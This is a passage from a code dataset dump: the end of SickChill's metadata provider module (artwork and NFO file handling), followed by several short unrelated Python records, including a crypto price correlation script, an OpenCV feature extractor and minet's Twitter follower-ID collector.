self._check_exists(self.get_season_banner_path(show_obj, season))\n\n def _has_season_all_poster(self, show_obj):\n return self._check_exists(self.get_season_all_poster_path(show_obj))\n\n def _has_season_all_banner(self, show_obj):\n return self._check_exists(self.get_season_all_banner_path(show_obj))\n\n def get_show_file_path(self, show_obj):\n return os.path.join(show_obj.location, self._show_metadata_filename)\n\n def get_episode_file_path(self, ep_obj):\n return replace_extension(ep_obj.location, self._ep_nfo_extension)\n\n def get_fanart_path(self, show_obj):\n return os.path.join(show_obj.location, self.fanart_name)\n\n def get_poster_path(self, show_obj):\n return os.path.join(show_obj.location, self.poster_name)\n\n def get_banner_path(self, show_obj):\n return os.path.join(show_obj.location, self.banner_name)\n\n @staticmethod\n def get_episode_thumb_path(ep_obj):\n \"\"\"\n Returns the path where the episode thumbnail should be stored.\n ep_obj: a TVEpisode instance for which to create the thumbnail\n \"\"\"\n if os.path.isfile(ep_obj.location):\n tbn_filename = remove_extension(ep_obj.location) + \"-thumb.jpg\"\n else:\n return None\n\n return tbn_filename\n\n @staticmethod\n def get_season_poster_path(show_obj, season):\n \"\"\"\n Returns the full path to the file for a given season poster.\n\n show_obj: a TVShow instance for which to generate the path\n season: a season number to be used for the path. Note that season 0\n means specials.\n \"\"\"\n\n # Our specials thumbnail is, well, special\n if season == 0:\n season_poster_filename = \"season-specials\"\n else:\n season_poster_filename = f\"season{season:02d}\"\n\n return os.path.join(show_obj.location, f\"{season_poster_filename}-poster.jpg\")\n\n @staticmethod\n def get_season_banner_path(show_obj, season):\n \"\"\"\n Returns the full path to the file for a given season banner.\n\n show_obj: a TVShow instance for which to generate the path\n season: a season number to be used for the path. Note that season 0\n means specials.\n \"\"\"\n\n # Our specials thumbnail is, well, special\n if season == 0:\n season_banner_filename = \"season-specials\"\n else:\n season_banner_filename = f\"season{season:02d}\"\n\n return os.path.join(show_obj.location, f\"{season_banner_filename}-banner.jpg\")\n\n def get_season_all_poster_path(self, show_obj):\n return os.path.join(show_obj.location, self.season_all_poster_name)\n\n def get_season_all_banner_path(self, show_obj):\n return os.path.join(show_obj.location, self.season_all_banner_name)\n\n def _show_data(self, show_obj) -> Union[ElementTree.ElementTree, None]:\n \"\"\"\n This should be overridden by the implementing class. It should\n provide the content of the show metadata file.\n \"\"\"\n return None\n\n def _ep_data(self, ep_obj) -> Union[ElementTree.ElementTree, None]:\n \"\"\"\n This should be overridden by the implementing class. It should\n provide the content of the episode metadata file.\n \"\"\"\n return None\n\n def create_show_metadata(self, show_obj):\n if self.show_metadata and show_obj and not self._has_show_metadata(show_obj):\n logger.debug(\"Metadata provider \" + self.name + \" creating show metadata for \" + show_obj.name)\n return self.write_show_file(show_obj)\n return False\n\n def update_show_indexer_metadata(self, show_obj):\n if self.show_metadata and show_obj and self._has_show_metadata(show_obj):\n logger.debug(\"Metadata provider \" + self.name + \" updating show indexer info metadata file for \" + show_obj.name)\n\n nfo_file_path = self.get_show_file_path(show_obj)\n\n try:\n with open(nfo_file_path, \"rb\") as xmlFileObj:\n showXML = ElementTree.ElementTree(file=xmlFileObj)\n\n indexerid = showXML.find(\"id\")\n\n root = showXML.getroot()\n if indexerid is not None:\n if indexerid.text == str(show_obj.indexerid):\n return True\n indexerid.text = str(show_obj.indexerid)\n else:\n ElementTree.SubElement(root, \"id\").text = str(show_obj.indexerid)\n\n # Make it purdy\n helpers.indentXML(root)\n\n showXML.write(nfo_file_path, encoding=\"UTF-8\", xml_declaration=True)\n helpers.chmodAsParent(nfo_file_path)\n\n return True\n except IOError as error:\n logger.error(f\"Unable to write file to {nfo_file_path} - are you sure the folder is writable? {error}\")\n\n def create_episode_metadata(self, ep_obj):\n if self.episode_metadata and ep_obj and not self._has_episode_metadata(ep_obj):\n logger.debug(\"Metadata provider \" + self.name + \" creating episode metadata for \" + ep_obj.pretty_name)\n return self.write_ep_file(ep_obj)\n return False\n\n def update_episode_metadata(self, ep_obj):\n if self.episode_metadata and ep_obj and self._has_episode_metadata(ep_obj):\n logger.debug(\"Metadata provider \" + self.name + \" updating episode indexer info metadata file for \" + ep_obj.pretty_name)\n nfo_file_path = self.get_episode_file_path(ep_obj)\n\n attribute_map = {\n \"title\": \"name\",\n \"aired\": \"airdate\",\n \"season\": \"season\",\n \"episode\": \"episode\",\n \"showtitle\": \"show.name\",\n \"runtime\": \"show.runtime\",\n \"plot\": \"description\",\n }\n try:\n with open(nfo_file_path, \"rb\") as xmlFileObj:\n episodeXML = ElementTree.ElementTree(file=xmlFileObj)\n\n changed = False\n for attribute in attribute_map:\n try:\n if not hasattr(ep_obj, attribute_map[attribute]):\n continue\n node = episodeXML.find(attribute)\n if node is None:\n continue\n\n text1 = \"\".join(node.text.splitlines())\n text2 = \"\".join(str(getattr(ep_obj, attribute_map[attribute])).splitlines())\n if text1 == text2:\n continue\n node.text = str(getattr(ep_obj, attribute_map[attribute]))\n changed = True\n except AttributeError:\n pass\n\n if not changed:\n return True\n\n root = episodeXML.getroot()\n\n # Make it purdy\n helpers.indentXML(root)\n\n episodeXML.write(nfo_file_path, encoding=\"UTF-8\", xml_declaration=True)\n helpers.chmodAsParent(nfo_file_path)\n\n return True\n except IOError as error:\n logger.warning(f\"Unable to write file to {nfo_file_path} - are you sure the folder is writable? {error}\")\n except ElementTree.ParseError as error:\n logger.warning(f\"Error parsing existing nfo file at {nfo_file_path} - {error}\")\n\n def create_fanart(self, show_obj):\n if self.fanart and show_obj and not self._has_fanart(show_obj):\n logger.debug(\"Metadata provider \" + self.name + \" creating fanart for \" + show_obj.name)\n return self.save_fanart(show_obj)\n return False\n\n def create_poster(self, show_obj):\n if self.poster and show_obj and not self._has_poster(show_obj):\n logger.debug(\"Metadata provider \" + self.name + \" creating poster for \" + show_obj.name)\n return self.save_poster(show_obj)\n return False\n\n def create_banner(self, show_obj):\n if self.banner and show_obj and not self._has_banner(show_obj):\n logger.debug(\"Metadata provider \" + self.name + \" creating banner for \" + show_obj.name)\n return self.save_banner(show_obj)\n return False\n\n def create_episode_thumb(self, ep_obj):\n if self.episode_thumbnails and ep_obj and not self._has_episode_thumb(ep_obj):\n logger.debug(\"Metadata provider \" + self.name + \" creating episode thumbnail for \" + ep_obj.pretty_name)\n return self.save_thumbnail(ep_obj)\n return False\n\n def create_season_posters(self, show_obj):\n if self.season_posters and show_obj:\n result = []\n for season in show_obj.episodes:\n if not self._has_season_poster(show_obj, season):\n logger.debug(\"Metadata provider \" + self.name + \" creating season posters for \" + show_obj.name)\n result.extend([self.save_season_poster(show_obj, season)])\n return all(result)\n return False\n\n def create_season_banners(self, show_obj):\n if self.season_banners and show_obj:\n result = []\n logger.debug(\"Metadata provider \" + self.name + \" creating season banners for \" + show_obj.name)\n for season in show_obj.episodes:\n if not self._has_season_banner(show_obj, season):\n result.extend([self.save_season_banner(show_obj, season)])\n return all(result)\n return False\n\n def create_season_all_poster(self, show_obj):\n if self.season_all_poster and show_obj and not self._has_season_all_poster(show_obj):\n logger.debug(\"Metadata provider \" + self.name + \" creating season all poster for \" + show_obj.name)\n return self.save_season_all_poster(show_obj)\n return False\n\n def create_season_all_banner(self, show_obj):\n if self.season_all_banner and show_obj and not self._has_season_all_banner(show_obj):\n logger.debug(\"Metadata provider \" + self.name + \" creating season all banner for \" + show_obj.name)\n return self.save_season_all_banner(show_obj)\n return False\n\n def write_show_file(self, show_obj):\n \"\"\"\n Generates and writes show_obj's metadata under the given path to the\n filename given by get_show_file_path()\n\n show_obj: TVShow object for which to create the metadata\n\n path: An absolute or relative path where we should put the file. Note that\n the file name will be the default show_filename.\n\n Note that this method expects that _show_data will return an ElementTree\n object. If your _show_data returns data in another format yo'll need to\n override this method.\n \"\"\"\n\n data = self._show_data(show_obj)\n\n if not data:\n return False\n\n nfo_file_path = self.get_show_file_path(show_obj)\n nfo_file_dir = os.path.dirname(nfo_file_path)\n\n try:\n if not os.path.isdir(nfo_file_dir):\n logger.debug(\"Metadata dir didn't exist, creating it at \" + nfo_file_dir)\n os.makedirs(nfo_file_dir)\n helpers.chmodAsParent(nfo_file_dir)\n\n logger.debug(\"Writing show nfo file to \" + nfo_file_path)\n\n nfo_file = open(nfo_file_path, \"wb\")\n data.write(nfo_file, encoding=\"UTF-8\", xml_declaration=True)\n nfo_file.close()\n helpers.chmodAsParent(nfo_file_path)\n except IOError as error:\n logger.error(f\"Unable to write file to {nfo_file_path} - are you sure the folder is writable? {error}\")\n return False\n\n return True\n\n def write_ep_file(self, ep_obj):\n \"\"\"\n Generates and writes ep_obj's metadata under the given path with the\n given filename root. Uses the episode's name with the extension in\n _ep_nfo_extension.\n\n ep_obj: TVEpisode object for which to create the metadata\n\n filename_path: The file name to use for this metadata. Note that the extension\n will be automatically added based on _ep_nfo_extension. This should\n include an absolute path.\n\n Note that this method expects that _ep_data will return an ElementTree\n object. If your _ep_data returns data in another format yo'll need to\n override this method.\n \"\"\"\n\n data = self._ep_data(ep_obj)\n if not data:\n return False\n\n # def print_data(d):\n # for child in d.getroot():\n # print(str(child.tag), str(child.text))\n\n # print_data(data)\n\n nfo_file_path = self.get_episode_file_path(ep_obj)\n nfo_file_dir = os.path.dirname(nfo_file_path)\n\n try:\n if not os.path.isdir(nfo_file_dir):\n logger.debug(\"Metadata dir didn't exist, creating it at \" + nfo_file_dir)\n os.makedirs(nfo_file_dir)\n helpers.chmodAsParent(nfo_file_dir)\n\n logger.debug(\"Writing episode nfo file to \" + nfo_file_path)\n nfo_file = open(nfo_file_path, \"wb\")\n data.write(nfo_file, encoding=\"UTF-8\", xml_declaration=True)\n nfo_file.close()\n helpers.chmodAsParent(nfo_file_path)\n except IOError as error:\n logger.error(f\"Unable to write file to {nfo_file_path} - are you sure the folder is writable? {error}\")\n return False\n\n return True\n\n def save_thumbnail(self, ep_obj):\n \"\"\"\n Retrieves a thumbnail and saves it to the correct spot. This method should not need to\n be overridden by implementing classes, changing get_episode_thumb_path and\n _get_episode_thumb_url should suffice.\n\n ep_obj: a TVEpisode object for which to generate a thumbnail\n \"\"\"\n\n thumb_url = sickchill.indexer.episode_image_url(ep_obj)\n if not thumb_url:\n logger.debug(\"No thumb is available for this episode, not creating a thumb\")\n return False\n\n file_path = self.get_episode_thumb_path(ep_obj)\n if not file_path:\n logger.debug(\"Unable to find a file path to use for this thumbnail, not generating it\")\n return False\n\n thumb_data = metadata_helpers.getShowImage(thumb_url)\n if not thumb_data:\n logger.debug(\"No thumb is available for this episode, not creating a thumb\")\n return False\n\n result = self._write_image(thumb_data, file_path)\n\n if not result:\n return False\n\n for cur_ep in [ep_obj] + ep_obj.relatedEps:\n cur_ep.hastbn = True\n\n return True\n\n def save_fanart(self, show_obj):\n \"\"\"\n Downloads a fanart image and saves it to the filename specified by fanart_name\n inside the show's root folder.\n\n show_obj: a TVShow object for which to download fanart\n \"\"\"\n\n # use the default fanart name\n fanart_path = self.get_fanart_path(show_obj)\n if not fanart_path:\n logger.debug(\"Fanart path for show {} came back blank, skipping this image\".format(show_obj.name))\n return False\n\n fanart_url = sickchill.indexer.series_fanart_url(show_obj)\n if not fanart_url:\n fanart_url = self._retrieve_show_image_urls_from_fanart(show_obj, \"fanart\")\n if not fanart_url:\n logger.debug(\"Fanart url not found for show {}, skipping this image\".format(show_obj.name))\n return False\n\n fanart_data = metadata_helpers.getShowImage(fanart_url)\n if not fanart_data:\n logger.debug(\"No fanart image was retrieved, unable to write fanart\")\n return False\n\n return self._write_image(fanart_data, fanart_path)\n\n def save_poster(self, show_obj):\n \"\"\"\n Downloads a poster image and saves it to the filename specified by poster_name\n inside the show's root folder.\n\n show_obj: a TVShow object for which to download a poster\n \"\"\"\n\n # use the default poster name\n poster_path = self.get_poster_path(show_obj)\n if not poster_path:\n logger.debug(\"Banner path for show {} came back blank, skipping this image\".format(show_obj.name))\n return False\n\n poster_url = sickchill.indexer.series_poster_url(show_obj)\n if not poster_url:\n poster_url = self._retrieve_show_image_urls_from_fanart(show_obj, \"poster\")\n if not poster_url:\n logger.debug(\"Poster url not found for show {}, skipping this image\".format(show_obj.name))\n return False\n\n poster_data = metadata_helpers.getShowImage(poster_url)\n if not poster_data:\n logger.debug(\"No show poster image was retrieved, unable to write poster\")\n return False\n\n return self._write_image(poster_data, poster_path)\n\n def save_banner(self, show_obj):\n \"\"\"\n Downloads a banner image and saves it to the filename specified by banner_name\n inside the show's root folder.\n\n show_obj: a TVShow object for which to download a banner\n \"\"\"\n\n banner_path = self.get_banner_path(show_obj)\n if not banner_path:\n logger.debug(\"Banner path for show {} came back blank, skipping this image\".format(show_obj.name))\n return False\n\n banner_url = sickchill.indexer.series_banner_url(show_obj)\n if not banner_url:\n banner_url = self._retrieve_show_image_urls_from_fanart(show_obj, \"banner\")\n if not banner_url:\n logger.debug(\"Banner url not found for show {}, skipping this image\".format(show_obj.name))\n return False\n\n banner_data = metadata_helpers.getShowImage(banner_url)\n if not banner_data:\n logger.debug(\"No show banner image was retrieved, unable to write banner\")\n return False\n\n return self._write_image(banner_data, banner_path)\n\n def save_season_poster(self, show_obj, season):\n \"\"\"\n Saves a specific season poster to disk for the given show.\n\n show_obj: a TVShow object for which to save the season thumbs\n \"\"\"\n\n season_poster_url = sickchill.indexer.season_poster_url(show_obj, season)\n if not season_poster_url:\n season_poster_url = self._retrieve_show_image_urls_from_fanart(show_obj, \"season_poster\", season=season)\n if not season_poster_url:\n logger.debug(\"Season poster url not found for season {}, skipping this season\".format(season))\n return False\n\n season_poster_file_path = self.get_season_poster_path(show_obj, season)\n if not season_poster_file_path:\n logger.debug(\"Path for season {} came back blank, skipping this season\".format(season))\n return False\n\n image_data = metadata_helpers.getShowImage(season_poster_url)\n if not image_data:\n logger.debug(\"No season poster data available, skipping this season\")\n return False\n\n return self._write_image(image_data, season_poster_file_path)\n\n def save_season_banner(self, show_obj, season):\n \"\"\"\n Saves the first season banner for a season to disk for the given show.\n\n show_obj: a TVShow object for which to save the season thumbs\n \"\"\"\n season_banner_url = sickchill.indexer.season_banner_url(show_obj, season)\n if not season_banner_url:\n season_banner_url = self._retrieve_show_image_urls_from_fanart(show_obj, \"season_banner\", season=season)\n if not season_banner_url:\n logger.debug(\"Url for season banner {} came back blank, skipping this season\".format(season))\n return False\n\n season_banner_file_path = self.get_season_banner_path(show_obj, season)\n if not season_banner_file_path:\n logger.debug(\"Path for season {} came back blank, skipping this season\".format(season))\n return False\n\n image_data = metadata_helpers.getShowImage(season_banner_url)\n if not image_data:\n logger.debug(\"No season banner data available, skipping this season\")\n return False\n\n return self._write_image(image_data, season_banner_file_path)\n\n def save_season_all_poster(self, show_obj):\n poster_url = sickchill.indexer.series_poster_url(show_obj)\n if not poster_url:\n poster_url = self._retrieve_show_image_urls_from_fanart(show_obj, \"season_poster\", season=0)\n if not poster_url:\n logger.debug(\"Url for season all poster came back blank, skipping this season\")\n return False\n\n season_poster_file_path = self.get_season_all_poster_path(show_obj)\n if not season_poster_file_path:\n logger.debug(\"Path for season all poster came back blank, skipping this season\")\n return False\n\n image_data = metadata_helpers.getShowImage(poster_url)\n if not image_data:\n logger.debug(\"No season all poster data available, skipping this season\")\n return False\n\n return self._write_image(image_data, season_poster_file_path)\n\n def save_season_all_banner(self, show_obj):\n banner_url = sickchill.indexer.series_banner_url(show_obj)\n if not banner_url:\n banner_url = self._retrieve_show_image_urls_from_fanart(show_obj, \"season_banner\", season=0)\n if not banner_url:\n logger.debug(\"Url for season all banner came back blank, skipping this season\")\n return False\n\n season_banner_file_path = self.get_season_all_banner_path(show_obj)\n if not season_banner_file_path:\n logger.debug(\"Path for season all banner came back blank, skipping this season\")\n return False\n\n image_data = metadata_helpers.getShowImage(banner_url)\n if not image_data:\n logger.debug(\"No season all banner data available, skipping this season\")\n return False\n\n return self._write_image(image_data, season_banner_file_path)\n\n @staticmethod\n def _write_image(image_data, image_path, overwrite=False):\n \"\"\"\n Saves the data in image_data to the location image_path. Returns True/False\n to represent success or failure.\n\n image_data: binary image data to write to file\n image_path: file location to save the image to\n \"\"\"\n\n # don't bother overwriting it\n if not overwrite and os.path.isfile(image_path):\n logger.debug(\"Image already exists, not downloading\")\n return False\n\n image_dir = os.path.dirname(image_path)\n\n if not image_data:\n logger.debug(\"Unable to retrieve image to save in {0}, skipping\".format(image_path))\n return False\n\n try:\n if not os.path.isdir(image_dir):\n logger.debug(\"Metadata dir didn't exist, creating it at \" + image_dir)\n os.makedirs(image_dir)\n helpers.chmodAsParent(image_dir)\n\n outFile = open(image_path, \"wb\")\n outFile.write(image_data)\n outFile.close()\n helpers.chmodAsParent(image_path)\n except IOError as error:\n logger.error(f\"Unable to write file to {image_path} - are you sure the folder is writable? {error}\")\n return False\n\n return True\n\n def retrieveShowMetadata(self, folder):\n \"\"\"\n Used only when mass adding Existing Shows, using previously generated Show metadata to reduce the need to query TVDB.\n \"\"\"\n\n empty_return = (None, None, None)\n\n metadata_path = os.path.join(folder, self._show_metadata_filename)\n\n if not os.path.isdir(folder) or not os.path.isfile(metadata_path):\n logger.debug(_(\"Can't load the metadata file from {0}, it doesn't exist\").format(metadata_path))\n return empty_return\n\n logger.debug(_(\"Loading show info from metadata file in {0}\").format(metadata_path))\n\n def read_xml():\n with open(metadata_path, \"rb\") as __xml_file:\n try:\n __show_xml = ElementTree.ElementTree(file=__xml_file)\n except (ElementTree.ParseError, IOError):\n __show_xml = None\n return __show_xml\n\n def fix_xml():\n logger.info(\n _(\n \"There was an error loading {0}, trying to repair it by fixing & symbols. If it still has problems, please check the file \" \"manually\"\n ).format(metadata_path)\n )\n with open(metadata_path) as __xml_file:\n output = __xml_file.read()\n\n regex = re.compile(r\"&(?!amp;|lt;|gt;)\")\n output = regex.sub(\"&\", output)\n with open(metadata_path, \"wb\") as __xml_file:\n __xml_file.write(output)\n\n return True\n\n try:\n show_xml = read_xml() or fix_xml() and read_xml()\n if not show_xml:\n logger.debug(_(\"Can't load the metadata file from {0}, error reading file\").format(metadata_path))\n return empty_return\n\n if not (show_xml.findtext(\"title\") or (show_xml.findtext(\"tvdbid\") and show_xml.findtext(\"id\"))):\n logger.info(\n _(\"Invalid info in tvshow.nfo (missing name or id): {0} {1} {2}\").format(\n show_xml.findtext(\"title\"), show_xml.findtext(\"tvdbid\"), show_xml.findtext(\"id\")\n )\n )\n return empty_return\n\n name = show_xml.findtext(\"title\")\n\n indexer_id_text = show_xml.findtext(\"tvdbid\") or show_xml.findtext(\"id\")\n if indexer_id_text:\n indexer_id = try_int(indexer_id_text, None)\n if indexer_id is None or indexer_id < 1:\n logger.debug(_(\"Invalid Indexer ID ({0}), not using metadata file\").format(str(indexer_id)))\n return empty_return\n else:\n logger.debug(_(\"Empty or field in NFO, unable to find a ID, not using metadata file\"))\n return empty_return\n\n indexer = 1\n epg_url_text = show_xml.findtext(\"episodeguide/url\")\n if epg_url_text:\n epg_url = epg_url_text.lower()\n if str(indexer_id) in epg_url and \"tvrage\" in epg_url:\n if sickchill.indexer.TVRAGE not in sickchill.indexer:\n logger.warning(_(\"Invalid Indexer ID ({0}), not using metadata file because it has TVRage info\").format(indexer_id))\n return empty_return\n return indexer_id, show_xml.findtext(\"title\"), sickchill.indexer.TVRAGE\n if str(indexer_id) in epg_url and \"tvdb\" in epg_url:\n return indexer_id, show_xml.findtext(\"title\"), sickchill.indexer.TVDB\n\n except Exception as error:\n logger.warning(_(\"There was an error parsing your existing metadata file: '{path}' error: {error}\").format(path=metadata_path, error=error))\n return empty_return\n\n return indexer_id, name, indexer\n\n @staticmethod\n def _retrieve_show_image_urls_from_tmdb(show, img_type, multiple=False):\n types = {\"poster\": \"posters\", \"banner\": None, \"fanart\": \"backdrops\", \"poster_thumb\": \"posters\", \"banner_thumb\": None}\n\n if not types[img_type]:\n return [] if multiple else \"\"\n\n # get TMDB configuration info\n tmdbsimple.API_KEY = settings.TMDB_API_KEY\n config = tmdbsimple.Configuration()\n response = config.info()\n base_url = response[\"images\"][\"base_url\"]\n sizes = response[\"images\"][\"poster_sizes\"]\n\n def size_str_to_int(x):\n return float(\"inf\") if x == \"original\" else int(x[1:])\n\n max_size = max(sizes, key=size_str_to_int)\n\n try:\n results = []\n find = tmdbsimple.Find(show.indexerid)\n found = find.info(external_source=\"tvdb_id\")\n if found[\"tv_results\"]:\n tmdb_show = tmdbsimple.TV(found[\"tv_results\"][0][\"id\"])\n images = tmdb_show.images()\n if types[img_type] in images:\n for result in images[types[img_type]]:\n results.append(\"{0}{1}{2}\".format(base_url, max_size, result[\"file_path\"]))\n if not multiple:\n return results[0]\n return results\n except Exception as error:\n logger.debug(error)\n\n logger.info(\"Could not find any \" + img_type + \" images on TMDB for \" + show.name)\n\n @staticmethod\n def _retrieve_show_image_urls_from_fanart(show, img_type, thumb=False, season=None, multiple=False):\n types = {\n \"poster\": fanart.TYPE.TV.POSTER,\n \"banner\": fanart.TYPE.TV.BANNER,\n \"poster_thumb\": fanart.TYPE.TV.POSTER,\n \"banner_thumb\": fanart.TYPE.TV.BANNER,\n \"fanart\": fanart.TYPE.TV.BACKGROUND,\n \"season_poster\": fanart.TYPE.TV.SEASONPOSTER,\n \"season_banner\": fanart.TYPE.TV.SEASONBANNER,\n }\n\n try:\n if img_type in types:\n request = fanartRequest(\n apikey=settings.FANART_API_KEY,\n id=show.indexerid,\n ws=fanart.WS.TV,\n type=types[img_type],\n sort=fanart.SORT.POPULAR,\n limit=(fanart.LIMIT.ONE, fanart.LIMIT.ALL)[season is not None],\n )\n\n resp = request.response()\n results = resp[types[img_type]]\n if season:\n results = [x for x in results if try_int(x[\"season\"], default_value=None) == season]\n\n def _to_preview_url(url):\n return re.sub(\"/fanart/\", \"/preview/\", url)\n\n if multiple:\n urls = [result[\"url\"] for result in results]\n if thumb:\n urls = [_to_preview_url(url) for url in urls]\n return urls\n else:\n url = results[0][\"url\"]\n if thumb:\n url = _to_preview_url(url)\n return url\n except Exception as error:\n logger.debug(error)\n\n logger.info(\"Could not find any \" + img_type + \" images on Fanart.tv for \" + show.name)\n","repo_name":"SickChill/sickchill","sub_path":"sickchill/providers/metadata/generic.py","file_name":"generic.py","file_ext":"py","file_size_in_byte":34875,"program_lang":"python","lang":"en","doc_type":"code","stars":2371,"dataset":"github-code","pt":"37"} +{"seq_id":"16175686422","text":"import numpy\nfrom sklearn.linear_model import LinearRegression\n\ndef find_corr_coeff():#ищем коэффициент корреляции между ethusdt и btcusdt\n with open(\"data_ETHUSDT.txt\", \"r\") as prices_files:\n lst_eth = list(map(float,prices_files.read().split(\", \")[:-1]))\n\n with open(\"data_BTCUSDT.txt\", \"r\") as prices_files:\n lst_btc = list(map(float,prices_files.read().split(\", \")[:-1]))\n\n coef_corr = numpy.corrcoef(numpy.array(lst_eth),numpy.array(lst_btc))[0,1]\n print(coef_corr)\n\nfind_corr_coeff()","repo_name":"C0deMaestro/Find_changes_futeres","sub_path":"find_change_price.py","file_name":"find_change_price.py","file_ext":"py","file_size_in_byte":546,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"27834603658","text":"import cv2\nimport time\nimport numpy as np\n\nclass FeatureExtractor:\n def __init__(self):\n # initalize all types of feature extractors here\n # self.extractor = cv2.ORB()\n self.extractor = cv2.SIFT()\n index_params = dict(algorithm = FLANN_INDEX_KDTREE, trees = 5)\n search_params = dict(checks=50)\n self.matcher = cv2.FlannBasedMatcher(index_params,search_params)\n \n def find_keypoints(self, images):\n # convert the image to grayscale first\n image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n keypoints, destination = self.extractor.detectAndCompute(image, None)\n return (keypoints, destination)\n \n def match_points_and_find_E(self, des1, des2, focal, camera_coords):\n \"\"\"\n routine to find essential matrix\n \"\"\"\n matches = self.matcher.knnMatch(des1,des2,k=2)\n good = []\n pts1 = []\n pts2 = [] \n for i,(m,n) in enumerate(matches):\n if (m.distance < 0.8*n.distance):\n good.append(m)\n pts2.append(kp2[m.trainIdx].pt)\n pts1.append(kp1[m.queryIdx].pt)\n pts1 = np.int32(pts1)\n pts2 = np.int32(pts2)\n E, mask = cv2.findEssentialMat(pts2, pts1, focal, camera_coords, RANSAC, 0.999, 1.0)\n\n # select the inlier points\n pts1 = pts1[mask.ravel()==1]\n pts2 = pts2[mask.ravel()==1]\n points, R, t, mask = cv2.recoverPose(E, pts1, pts2)\n return (R,t)","repo_name":"harshmunshi/MonoVO-Python","sub_path":"features.py","file_name":"features.py","file_ext":"py","file_size_in_byte":1481,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"36226201386","text":"import logging\r\n\r\nfrom persistence import local_io, database\r\n\r\n\r\nlogger = logging.getLogger(__name__)\r\n\r\n\r\nclass Launcher:\r\n \"\"\"Template for launching collections of modules\"\"\"\r\n\r\n def __init__(self, **modules):\r\n \"\"\"\"\"\"\r\n self.persistence = local_io.PersistentDict(\"persistence/prst.json\")\r\n self.db_utils = database.DatabaseUtils\r\n self.modules = modules\r\n\r\n logger.info(self.__class__.__name__ + \" initialized\")\r\n\r\n if len(self.persistence) == 0:\r\n self.init_persistence()\r\n self.persistence[\"global\"][\"reboots\"] += 1\r\n \r\n self.launch_modules()\r\n\r\n \r\n \r\n def launch_modules(self):\r\n for module in self.modules.values():\r\n logger.info(\"Starting module {}\".format(module.__class__.__name__))\r\n module.modules = self.modules\r\n module.persistence = self.persistence\r\n module.db_utils = self.db_utils()\r\n module.start()\r\n\r\n\r\n def init_persistence(self):\r\n logger.warning(\"No persistence found, created a new one\")\r\n\r\n self.persistence[\"global\"] ={\r\n \"lists\" : {},\r\n \"reboots\": 0\r\n }\r\n\r\n for m_name in self.modules.keys():\r\n data = {}\r\n if m_name == \"bot\":\r\n data = {\r\n \"send_activity\" : {\"hour\":[], \"count\":[]},\r\n \"receive_activity\" : {\"hour\":[], \"count\":[]},\r\n \"execute_activity\" : {\"hour\":[], \"count\":[]},\r\n \"log\": [],\r\n \"chat_members\": {},\r\n \"aliases\" : {}\r\n }\r\n if m_name == \"clock\":\r\n data = {\r\n \"sensors\" : {\r\n \"time\" : [],\r\n \"temperature\":[],\r\n \"humidity\":[],\r\n \"brightness\" : [],\r\n }\r\n }\r\n \r\n self.persistence[m_name] = data\r\n\r\n ","repo_name":"moll-re/AIO","sub_path":"app/launcher.py","file_name":"launcher.py","file_ext":"py","file_size_in_byte":2023,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8329940961","text":"# =============================================================================\n# Minet Twitter CLI Utils\n# =============================================================================\n#\n# Miscellaneous generic functions used throughout the twitter actions.\n#\nimport casanova\nimport sys\nfrom ebbe import with_is_last\nfrom tqdm import tqdm\nfrom twitwi import TwitterWrapper\nfrom twitter import TwitterHTTPError\n\n\ndef make_twitter_action(method_name, csv_headers):\n\n def action(namespace, output_file):\n\n # TODO: this is temp debug\n def listener(event, data):\n tqdm.write(event, file=sys.stderr)\n tqdm.write(repr(data), file=sys.stderr)\n\n wrapper = TwitterWrapper(\n namespace.access_token,\n namespace.access_token_secret,\n namespace.api_key,\n namespace.api_secret_key,\n listener=listener\n )\n\n enricher = casanova.enricher(\n namespace.file,\n output_file,\n keep=namespace.select,\n add=csv_headers + ['cursor'],\n resumable=namespace.resume,\n auto_resume=False\n )\n\n loading_bar = tqdm(\n desc='Retrieving ids',\n dynamic_ncols=True,\n total=namespace.total,\n unit=' followers',\n postfix={\n 'users': 0\n }\n )\n\n users_done = 0\n users_not_found = 0\n skipped = 0\n\n def update_stats():\n kwargs = {\n 'users': users_done\n }\n\n if users_not_found:\n kwargs['not_found'] = users_not_found\n\n if skipped:\n kwargs['skipped'] = skipped\n\n loading_bar.set_postfix(**kwargs)\n\n last_batch = None\n\n if namespace.resume:\n # TODO: sacralize this in specialized casanova enricher\n last_batch = casanova.reverse_reader.last_batch(\n output_file.name,\n batch_value=namespace.column,\n batch_cursor='cursor',\n end_symbol='end'\n )\n\n for row, user in enricher.cells(namespace.column, with_rows=True):\n if last_batch:\n if user != last_batch.value:\n skipped += 1\n update_stats()\n continue\n\n if user == last_batch.value and last_batch.finished:\n last_batch = None\n skipped += 1\n update_stats()\n continue\n\n all_ids = []\n next_cursor = -1\n result = None\n\n if last_batch and last_batch.cursor:\n next_cursor = last_batch.cursor\n\n if namespace.ids:\n wrapper_kwargs = {'user_id': user}\n else:\n wrapper_kwargs = {'screen_name': user}\n\n while next_cursor != 0:\n wrapper_kwargs['cursor'] = next_cursor\n\n skip_in_output = None\n\n if last_batch:\n skip_in_output = set(row[-2] for row in last_batch.rows)\n last_batch = None\n\n try:\n result = wrapper.call([method_name, 'ids'], **wrapper_kwargs)\n except TwitterHTTPError as e:\n\n # The user does not exist\n users_not_found += 1\n update_stats()\n break\n\n if result is not None:\n all_ids = result.get('ids', [])\n next_cursor = result.get('next_cursor', 0)\n\n loading_bar.update(len(all_ids))\n\n for is_last, user_id in with_is_last(all_ids):\n if skip_in_output and user_id in skip_in_output:\n continue\n\n if is_last:\n addendum = [user_id, next_cursor or 'end']\n else:\n addendum = [user_id, '']\n\n enricher.writerow(row, addendum)\n else:\n next_cursor = 0\n\n users_done += 1\n update_stats()\n\n loading_bar.close()\n\n return action\n","repo_name":"lebelgique/minet","sub_path":"minet/cli/twitter/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"2503129210","text":"import os\nimport pickle\nfrom time import time_ns\n\nimport requests\nfrom bs4 import BeautifulSoup\n\n\nclass SynonymsManager:\n __key = object()\n __instance = None\n\n def save(self):\n with open('synonyms_manager.pickle', 'wb') as file:\n pickle.dump(self, file)\n\n @staticmethod\n def load():\n if not os.path.exists('synonyms_manager.pickle'):\n return None\n with 